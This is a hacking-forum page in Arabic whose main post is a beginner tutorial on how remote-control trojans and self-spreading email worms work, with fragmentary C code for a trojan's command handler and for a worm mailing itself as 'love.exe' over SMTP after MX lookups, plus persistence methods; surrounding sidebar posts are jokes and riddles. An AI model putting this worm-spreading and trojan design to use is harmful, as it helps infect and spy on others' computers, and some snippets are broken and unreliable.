bienveni chez forum aziz
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

bienveni chez forum aziz

Forum de communication et de l'amitié vous souhaite un agréable moment et d'éliminer les remercier tous ceux qui ont contribué au développement
 
الرئيسيةتعلم التجسس والإختراق (بطريقة الخبراء), درس شامل I_icon_mini_portalأحدث الصورالتسجيلدخول
المواضيع الأخيرة
» كليب ولا في الاحلام
تعلم التجسس والإختراق (بطريقة الخبراء), درس شامل Icon_minitimeالإثنين 12 يناير - 9:25 من طرف admin-aziz

» لمحبي أكوووووووووووون
تعلم التجسس والإختراق (بطريقة الخبراء), درس شامل Icon_minitimeالأحد 11 يناير - 9:47 من طرف admin-aziz

» أغنية هزت العالم
تعلم التجسس والإختراق (بطريقة الخبراء), درس شامل Icon_minitimeالأحد 11 يناير - 9:35 من طرف admin-aziz

» video clips music no one
تعلم التجسس والإختراق (بطريقة الخبراء), درس شامل Icon_minitimeالأحد 11 يناير - 9:25 من طرف admin-aziz

» اهديكم اليوم برنامج رااااااااائع لكل مسلم
تعلم التجسس والإختراق (بطريقة الخبراء), درس شامل Icon_minitimeالسبت 13 ديسمبر - 13:40 من طرف admin2

» موضوع .. عبارة عن شرح لكيفية زيادة صوت samsung e-250
تعلم التجسس والإختراق (بطريقة الخبراء), درس شامل Icon_minitimeالسبت 13 ديسمبر - 13:26 من طرف admin-aziz

» مشاركة برنامج الملتي ماسنجر اخر إصدار Live Messenger PolyPatch - 8
تعلم التجسس والإختراق (بطريقة الخبراء), درس شامل Icon_minitimeالجمعة 12 ديسمبر - 12:08 من طرف ahmed

» حصرى كل خفايا الماسنجر
تعلم التجسس والإختراق (بطريقة الخبراء), درس شامل Icon_minitimeالجمعة 12 ديسمبر - 7:53 من طرف admin-aziz

» كيفية وضع المكياج على الوجه بالطريقة الصحيحة
تعلم التجسس والإختراق (بطريقة الخبراء), درس شامل Icon_minitimeالخميس 11 ديسمبر - 13:22 من طرف admin2

الغاز الاذكياء
تعلم التجسس والإختراق (بطريقة الخبراء), درس شامل Icon_minitimeالأربعاء 3 ديسمبر - 10:25 من طرف admin2
ما هو الشئ الذي إذا أكلت نصفه لا يحصل لك شيئ وإذا أكلته كاملا تموت
من هي أصغر الدولة العربية
في امريكي و سعودي تضاربو ليش؟؟
ما هي الفاكهة التي إذا قلبت أحرفها لا يتغير إسمها
سلطان حكم جميع بلاد العالم من غير جيوش او …

تعاليق: 0
نكت....زواج
تعلم التجسس والإختراق (بطريقة الخبراء), درس شامل Icon_minitimeالثلاثاء 28 أكتوبر - 20:11 من طرف sniper
بسم الله الرحمان الرحيم



واحد كريم تزوج وحده كريمه .. جابوا ولد ..... عطوه الجيران




طالب في الابتدائيه قال لمعلمته : أنا أحبك وأريد أن أتزوجك ,قالت المعلمه : ولكنني لا أحب ألأطفال ,قال الطالب :مو مشكلة ما نسوي …

تعاليق: 0
محشش يمتحنوه شوفوا شيجاوب ههه
تعلم التجسس والإختراق (بطريقة الخبراء), درس شامل Icon_minitimeالأحد 26 أكتوبر - 11:48 من طرف admin-aziz


ماذا تعرف عن أشهر القادة العسكريين في الحرب العالمية الأولى؟
ـ كلـــهم ماتوا

إذا أعطاك احد برتقــالة فماذا تقــول له؟
ـ أقول له قشرها

ماذا فعل الرومانيون بعد عبورهم البحـــر المتوســـط؟
ـ جففــوا ملابســــهم



تعاليق: 0
//// نكت مغربية ////
تعلم التجسس والإختراق (بطريقة الخبراء), درس شامل Icon_minitimeالأحد 26 أكتوبر - 11:42 من طرف admin-aziz
قالك هدا سبيطار د الحماق طلقوهم فواحد الجردة كل واحد شنو كايدير واحد يضرب راسو مع الشجر واحد ياكل فالشجر المهم واحد طلع لواحد الشجرة و بدا جالس مشا عندو طبيب هو قرب منو و هو طاح كاو قالو اطبيب امالك قالو اخمجت



...



تعاليق: 0
27 نكتة مغربية جامدة ممنوع دخول من يعاني من كترت الضحك
تعلم التجسس والإختراق (بطريقة الخبراء), درس شامل Icon_minitimeالأحد 26 أكتوبر - 11:38 من طرف admin-aziz
[center]1


هذا واحد العروبي مشى للبحرعين الدياب ،

شاف البنات كيتشمسو ، قال لواحد الشمكار؛ ناري كون كانت السيبة. رد عليه الشمكار؛ كون كانت السيبة نبدا بيك أنت الاول




2


نصيحة : إلا طاح ليك درهم في جامع الفناء بمراكش ، فلا …

تعاليق: 0
اغبى خمس اسئلة في العالم بس اتحداكم انكم تحلوها
تعلم التجسس والإختراق (بطريقة الخبراء), درس شامل Icon_minitimeالأحد 26 أكتوبر - 11:35 من طرف admin-aziz
اغبى خمس اسئلة في العالم بس اتحداكم انكم تحلوها



اغبى خمس اسئله في العالم,,اهيه غبيه بس اتحداكم تحلونها,,يلا ورونا

شطارتكم هذي قصه واحد غـــــــبـــــــي شارك في مسابقه ثقافيه

وبتدأت المسابقه بالسؤال الاول <<< …


تعاليق: 0
لغز - كيف عرف الضابط ان الجندى يكذب ؟؟؟
تعلم التجسس والإختراق (بطريقة الخبراء), درس شامل Icon_minitimeالأحد 26 أكتوبر - 11:29 من طرف admin-aziz
السلام عليكم ورحمه الله وبركاته
ما بقول اتحدى بل اتمني ولا تدرون اتحدى
لغزي عبارة عن قضية ارجوا منكم فك رموزها



تدور هذه القصة في احد العمارات في احد الاحياء الشعبيه الخطيرة

في منتصف الليل

وكان ضابط وجندي في …


تعاليق: 0
تسجيل صفحاتك المفضلة في مواقع خارجية
تسجيل صفحاتك المفضلة في مواقع خارجية reddit      

Conservez et partagez l'adresse de bienveni chez forum aziz sur votre site de social bookmarking

قم بحفض و مشاطرة الرابط bienveni chez forum aziz على موقع حفض الصفحات

 

 تعلم التجسس والإختراق (بطريقة الخبراء), درس شامل

اذهب الى الأسفل 
كاتب الموضوعرسالة
admin-aziz
Admin
admin-aziz


عدد الرسائل : 46
العمر : 35
تاريخ التسجيل : 25/10/2008

تعلم التجسس والإختراق (بطريقة الخبراء), درس شامل Empty
مُساهمةموضوع: تعلم التجسس والإختراق (بطريقة الخبراء), درس شامل   تعلم التجسس والإختراق (بطريقة الخبراء), درس شامل Icon_minitimeالسبت 8 نوفمبر - 8:30

مرحبا...

أمن المعلومات من المواضيع المهمة في عالم الكمبيوتر وأعتقد أنة سيصبح أهم موضوع يشغل بال المهتمين

بالكمبيوتر في السنوات المقبلة والسبب تطور أساليب القرصنة وإتساع مجالها

قبل يومين تقريبا أردت تحديث نظام تشغيل لم أستخدمة منذ فترة وعندما بحثت عن التحديثات الجديدة

وجدت 60 تحديث جديد منهم 56 في الأمن؟؟ وطبعا هذا الذي تم إكتشافة في مدة سنة ونصف والذي لم يكتشف أعظم

على ماذا يدل هذا في رأيك بكل بساطة يدل على كارثة تهدد كل من يعتمد على الكمبيوتر في تجارة

أو صناعة أو معلومات والدليل قبل فترة بسيطة خسائر موقع جوجل ملايين الدولارات لأنة أعتمد

على التقنية وفتح مزاد علني على الإنترنت.

ما يهمنا من هذة المقدمة أنا الشغلة خطيرة و معقدة وحيرت الخبراء ولكن كيف

كما تعودنا دائما نبدأ من الأسهل ثم الأعقد وسيكون الشرح بالترتيب التالي:



الإختراق عن طريق ملفات التجسس (كيف تعمل ملفات التجسس)

الإختراق عن طريق فايروسات البريد(كيف تعمل فايروسات البريد)

الإختراق عن طريق ثغرات الأنظمة ( كيف تخترق الأنظمة)

الإختراق عن طريق تقنيات الإتصالات السلكية والاسلكية (إصطياد المعلومات)



أولا: ملفات التجسس

هذة الطريقة أسهل طريقة وأشهر طريقة والمعروفة عند أغلب الأعضاء

وتتم كالتالي

إرسال الخادم إلى الضحية - الإتصال بالخادم - إرسال المعلومات للخادم

ولكني سأخرج عن الروتين المتبع في شرح الإختراق وسأشرح كيف تعمل هذة البرامج

الخادم

بكل بساطة الخادم عبارة عن برنامج يفتح منفذ في الجهاز لتلقي الأوامر من برنامج خارجي لتنفيذها على الجهاز

فمثلا لفتح السيدي برنامج الإختراق يرسل معلومة إلى الخادم أي معلومة يحددها المبرمج ولتكن

0xAA

ويتم إرسالها بالطريقة التالية
كودsend(s,(char*)0xAA,1,0);

وعندما يستقبلها الخادم يقارن ما هي التعليمة وينفذ الكود المطلوب بهذة الطريقة
كودDWORD cmd;
char rcv[10];
recv(s,rcv,10,0);
sscanf(rcv,"%X",&cmd);

switch(cmd)
{
......
......
case 0xAA:
mciSendString("set cdaudio door open",szbuf,255,hwnd);
break;
....
....
}

والي أريد أوصلة إن برنامج الإختراق لا ينفذ أي شيء وإنما الخادم بة كل دوال التنفيذ ولذالك تجد الخادم أكبر في الحجم

فكرة الخادم عن طريق الدوال

listen
recv


فكرة برنامج الإختراق عن طريق الدوال

connect
send


وللزيادة فكرة محرر الخادم

CreateFileMapping
MapViewOfFile


أعتقد هذا الموضوع يحتاج مثال وسأضع مثال لبرنامج تجسس إذا وافق المشرفين عن المنتدى

وثاني شيء لا نريد التعمق في هذا الموضوع لأنة من المواضع القديمة جداا

وخلونا نواكب العصر ونهتم بالجديد في عالم الهكر

ثانيا: فايروسات البريد

وهي أكثر الفايروسات إنتشارا في العالم لأنها ذكية وذاتية الإنتشار

لتشريح هذا النوع من الفايروسات لازم نأخذة من عدة نواحي

كيف ينشر نفسة و كيف يشغل نفسة بنفسة

طريقة إنتشارة

بعد ما يصمم المبرمج هذا الفايروس يقوم من مكان مجهول بإرسال هذا الفايروس إلى عدد من الإيميلات

وبعدة ينسى أمرة لأن الفايروس سيقوم بنشر نفسة

عندما يشغل أي مستخدم الفايروس بعد أن يستقبلة من البريد تحدث أمور كثيرة

أول ماظهرت هذة الفايروسات كانت تقوم بعمل واحد البحث عن عنواين البريد في الجهاز الضحية

إما أن تكون في دفتر العناوين أو في برنامج البريد وبعدها يرسل نفسة إلى هذة العناوين

وبعد فترة تطورت هذة الفايروسات وصارت طريقة عملها بهذا الشكل

يقوم الفايروس بالبحث عن العناوين في سيرفرات مشهورة مثل

سيرفر الشات أو سيرفر البريد أو قوائم البريد في بعض المواقع

ولكن كيف يقوم بالبحث وإرسال نفسة وكيف يعرف بروتوكولات البريد؟

smpt,pop3

الجواب

لو نرجع لدراست الشبكات والبروتوكولات لوجدنا موضوع مهم نظام أسماء المجالات

DNS

ينقسم هذا المجال لعدة أقسام ما يهمنا في هذا الدرس هو قسم

MX

ومعناة تبادل الرسائل

Mail Exchange

هذا القسم عبارة عن عناوين تبادل الرسائل في سيرفر البريد

لو نلاحظ موقع ياهو يحتوي سجل تبادل الرسائل على العناوين التالية

-------------------------------------------------------------------

yahoo.com MX preference = 1, mail exchanger = mx2.mail.yahoo.c
yahoo.com MX preference = 5, mail exchanger = mx4.mail.yahoo.c
yahoo.com MX preference = 1, mail exchanger = mx1.mail.yahoo.c

yahoo.com nameserver = ns1.yahoo.com
yahoo.com nameserver = ns2.yahoo.com
yahoo.com nameserver = ns3.yahoo.com
yahoo.com nameserver = ns4.yahoo.com
yahoo.com nameserver = ns5.yahoo.com
mx2.mail.yahoo.com internet address = 64.156.215.5
mx2.mail.yahoo.com internet address = 64.156.215.6
mx4.mail.yahoo.com internet address = 216.136.129.15
mx4.mail.yahoo.com internet address = 66.218.86.254
mx4.mail.yahoo.com internet address = 216.136.129.17
mx4.mail.yahoo.com internet address = 66.218.86.253
mx4.mail.yahoo.com internet address = 216.136.129.18
mx1.mail.yahoo.com internet address = 64.157.4.82
mx1.mail.yahoo.com internet address = 64.157.4.83
mx1.mail.yahoo.com internet address = 64.157.4.84
mx1.mail.yahoo.com internet address = 64.156.215.5
ns1.yahoo.com internet address = 66.218.71.63
ns2.yahoo.com internet address = 66.163.169.170
ns3.yahoo.com internet address = 217.12.4.104
ns4.yahoo.com internet address = 63.250.206.138
ns5.yahoo.com internet address = 64.58.77.85
-----------------------------------------------------------------------------------------

بمعنى أن هذة العناوين

mx1.mail.yahoo.com

mx2.mail.yahoo.com

mx3.mail.yahoo.com

mx4.mail.yahoo.com

عناوين السيرفر الذي يقوم بتبادل الرسائل

وتستطيع عرض سجل البريد لأي موقع عن طريق برنامج الدوس وبهذة الطريقة

nslookup mx yahoo.com

وبعد أن يقوم الفايروس بإظهار عنوان السيرفر يرسل نفسة

أول شيء يقوم بة بناء رسالة تحتوي على ملف مرفق بهذة الطريقة

كودchar szRcv[MAX_PATH]

//// HELO
strcpy(szRcv,"HELO Yahoo\r\n");
send(sct,szRcv,strlen(szRcv),0);
recv(sct,szRcv,MAX_PATH,0);

// MAIL FROM:
strcpy(szRcv,"MAIL FROM: <from@yahoo.com>\r\n");
send(sct,szRcv,strlen(szRcv),0);
recv(sct,szRcv,MAX_PATH,0);

//// RCPT TO:
strcpy(szRcv,"RCPT TO: <to@yahoo.com>\r\n");
send(sct,szRcv,strlen(szRcv),0);
recv(sct,szRcv,MAX_PATH,0);

//// DATA
strcpy(szRcv,"DATA\r\n");
send(sct,szRcv,strlen(szRcv),0);
recv(sct,szRcv,MAX_PATH,0);
----------------------------------------
//Build Mail
ZeroMemory(szRcv,MAX_PATH);
strcpy(szRcv,"From: from@yahoo.com\r\nTo: to@yahoo.com\r\nDate: 2004\r\nSubject: Ilove You\r\n");

strcpy(BualdMsg,szRcv);
strcat(BualdMsg,"Rq-Mail: WC Mail\r\n");
strcat(BualdMsg,"MIME-Version: 1.0\r\n");
strcat(BualdMsg,"Content-Type: multipart/mixed; boundary=WC_MAIL_PaRt_BoUnDaRy_5168011\r\n\n");
strcat(BualdMsg,"This is a multi-part message in MIME format.\r\n\n");
//
strcat(BualdMsg,"--WC_MAIL_PaRt_BoUnDaRy_5168011\r\n");
strcat(BualdMsg,"Content-Type: text/plain\r\n");
strcat(BualdMsg,"Content-Transfer-Encoding: 7Bit\r\n\n");
strcat(BualdMsg,"body mail\r\n");

//
strcat(BualdMsg,"--WC_MAIL_PaRt_BoUnDaRy_5168011\r\n");
strcat(BualdMsg,"Content-Type:application/octet-stream; file=love.exe\r\n");
strcat(BualdMsg,"Content-Transfer-Encoding: base64\r\n");
strcat(BualdMsg,"Content-Disposition: attachment; filename=love.exe\r\n\n");
strcat(BualdMsg,"EXE Code");
strcat(BualdMsg,"\r\n\n");
strcat(BualdMsg,"--WC_MAIL_PaRt_BoUnDaRy_5168011--\r\n");

strcat(BualdMsg,"\r\n.\r\n");

//Send File
send(sct,BualdMsg,strlen(BualdMsg),0);
recv(sct,szRcv,MAX_PATH,0);


ولكن يجب أن تنتبة لهذة الكلمة في الكود

EXE Code

هذا الكلمة توضع مكانها شفرة الفايروس بعد التشفير

ويتم تشفير الملف بعدة طرق وقانون التشفير هو

كودCode<<= 8;
Code |= (indexCode & 0xff);
Code += 8;

وبعدها يتم الإرسال

هذة بكل بساطة دورة تكاثر الفايروس وإنتشارة

أما عن طريقة تشغيل نفسة فالمسألة بسيطة جدا

عن طريق

الريجستري

عن طريق ملفات التأسيس

كتابة نفسة في مقدمة البرامج

كتابة نفسة في قطاع الإقلاع في القرص الصلب



هذة الطرق في الإختراق لا تعتبر مشكلة وقد وجد لها حلول قد

تكون مفيدة والهدف من شرحها أن تكون مقدمة للدروس القادمة

التي ستتعلم بعدها أمور يجهلها الكثييير في الأمن والحماية ولا يوجد لها حلول إلى وقتنا الحالي

وإنتظرو للموضوع بقية
الرجوع الى أعلى الصفحة اذهب الى الأسفل
https://deskotika-aziz.1fr1.net
 
تعلم التجسس والإختراق (بطريقة الخبراء), درس شامل
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
» تعلم قرصنة الهوتميل

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
bienveni chez forum aziz :: منتدى القرصنة-
انتقل الى: